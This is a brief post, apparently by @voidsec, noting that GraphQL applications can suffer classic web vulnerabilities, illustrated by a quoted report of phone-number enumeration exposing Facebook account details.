GraphQL is an interesting new technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilities like Broken Access Controls, Insecure Direct Object References, Cross Site Scripting (XSS) and Classic Injection Bugs. Like any technology, GraphQL-based applications may be prone to implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec